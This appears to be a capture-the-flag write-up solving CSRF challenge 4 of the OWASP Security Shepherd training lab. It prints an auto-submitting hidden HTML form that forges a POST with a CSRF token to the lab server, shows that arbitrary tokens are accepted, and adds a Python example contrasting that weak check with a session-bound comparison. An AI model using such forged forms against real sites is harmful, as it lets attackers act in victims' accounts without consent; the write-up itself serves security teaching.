OWASP Security Shepherd Project - CSRF 4 (CSRF Challenge)
Challenge
Solution
Challenge 4 is actually quite boring once we have finished challenge 3, because the two challenges are nearly identical and we also have the csrfToken provided. Let's try using the csrfToken directly, which makes our form look like this:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengefour/plusplus" method="POST">
<input type="hidden" name="userid" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
<input type="hidden" name="csrfToken" value="-166399789448968328107143422839305748030"/>
<input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>
As always, let's use python -m SimpleHTTPServer <port> to start an HTTP server and submit the URL, then log in as another user to see what happens.
We complete the challenge! However, I do notice that the csrfToken for this user is actually different from the original one.
This means that either the csrfToken is useless or the token the challenge provided is a panacea for the challenge. By changing the csrfToken to an arbitrary number, we learn that the truth is the former : )
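What the arbitrary-token result means on the server side, as an added example (not code from this post or from Security Shepherd): `weak_check` is an assumed model of the behaviour observed above, and `strict_check` is the session-bound comparison that would have rejected the forged form. All function names and the in-memory session store are hypothetical.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> CSRF token.
SESSIONS = {}

def open_session(session_id):
    """Create a session and bind a fresh, unpredictable numeric token to it."""
    SESSIONS[session_id] = str(secrets.randbits(128))
    return SESSIONS[session_id]

def weak_check(session_id, submitted):
    """Assumed model of the observed flaw: any integer-looking token passes."""
    try:
        int(submitted)
        return True
    except (TypeError, ValueError):
        return False

def strict_check(session_id, submitted):
    """Accept only the token bound to this session, compared in constant time."""
    expected = SESSIONS.get(session_id)
    if expected is None or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())

def replay_forged_posts():
    """Replay three POSTs against the victim's session under both checks."""
    victim_token = open_session("victim")
    other_token = open_session("attacker")
    cases = {
        "victim's own token": victim_token,
        "another user's token": other_token,
        "arbitrary number": "12345",
    }
    # Each result is (weak_check verdict, strict_check verdict).
    return {name: (weak_check("victim", tok), strict_check("victim", tok))
            for name, tok in cases.items()}

if __name__ == "__main__":
    for name, (weak, strict) in replay_forged_posts().items():
        print(f"{name:22} weak={weak!s:5} strict={strict}")
```
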